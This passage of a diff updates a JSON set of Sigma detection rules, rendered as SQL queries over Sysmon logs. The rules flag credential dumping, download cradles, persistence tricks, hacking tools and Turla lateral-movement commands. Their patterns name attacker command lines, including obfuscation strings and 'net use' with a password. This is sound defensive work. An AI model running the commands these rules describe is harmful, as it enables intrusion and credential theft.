'06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR 
ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", - "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects 
the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", - "author": "@gott_cyber", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.t1105" + "attack.t1542.001" ], "falsepositives": [ - "Since the content of the files are unknown, false positives are expected" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_ldifde_file_load.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "Application Removed Via Wmic.EXE", - "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "title": "Potential Persistence Via Microsoft Compatibility Appraiser", + "id": "f548a603-c9f2-4c89-b511-b089f7e94549", "status": "experimental", - "description": "Uninstall an application with wmic", - "author": "frac113", + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.t1047" 
+ "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_uninstall_application.yml" + "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" }, { - "title": "Set Files as System Files Using Attrib.EXE", - "id": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", - "status": "experimental", - "description": "Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files", - "author": "frack113", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 
'%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_system.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Potential Network Sniffing Activity Using Network Tools", - "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", - "status": "test", - "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Use of UltraVNC Remote Access Software", + "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate administration activity to troubleshoot network issues" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR Image LIKE '%\\\\windump.exe' ESCAPE 
'\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" ], - "filename": "proc_creation_win_network_sniffing.yml" + "filename": "proc_creation_win_ultravnc.yml" }, { - "title": "Change Default File Association Via Assoc", - "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", - "status": "test", - "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Timur Zinniatullin, oscd.community", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%assoc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 
'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_assoc_execution.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Fsutil Drive Enumeration", - "id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", - "status": "experimental", - "description": "Attackers may leverage fsutil to enumerated connected drives.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.discovery", - "attack.t1120" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Certain software or administrative tasks may trigger false positives." + "Legitimate usage of stordiag.exe." 
], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND CommandLine LIKE '%drives%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fsutil_drive_enumeration.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", - "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", + "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "status": "test", + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND 
CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_reg_add_run_key.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - Process Creation", - "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", - "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "status": "test", + "description": "Detects a suspicious script executions in temporary folders or folders 
accessible by environment variables", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image 
LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_download_com_cradles.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1557.001" + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Unlikely" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Direct Autorun Keys Modification", - "id": "24357373-078f-44ed-9ac4-6d334a668a11", + 
"title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "status": "test", - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' 
OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "New Firewall Rule Added Via Netsh.EXE", - "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "title": "Potential Arbitrary DLL Load Using Winword", + "id": "f7375e28-5c14-432f-b8d1-1db26c832df3", "status": "test", - "description": "Detects the addition of a new rule to the Windows firewall via netsh", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1202" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' 
ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_add_rule.yml" + "filename": "proc_creation_win_office_winword_dll_load.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "title": "MsiExec Web Install", + "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_msiexec_web_install.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "status": "test", - "description": "The CrachMapExec pentesting framework 
implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 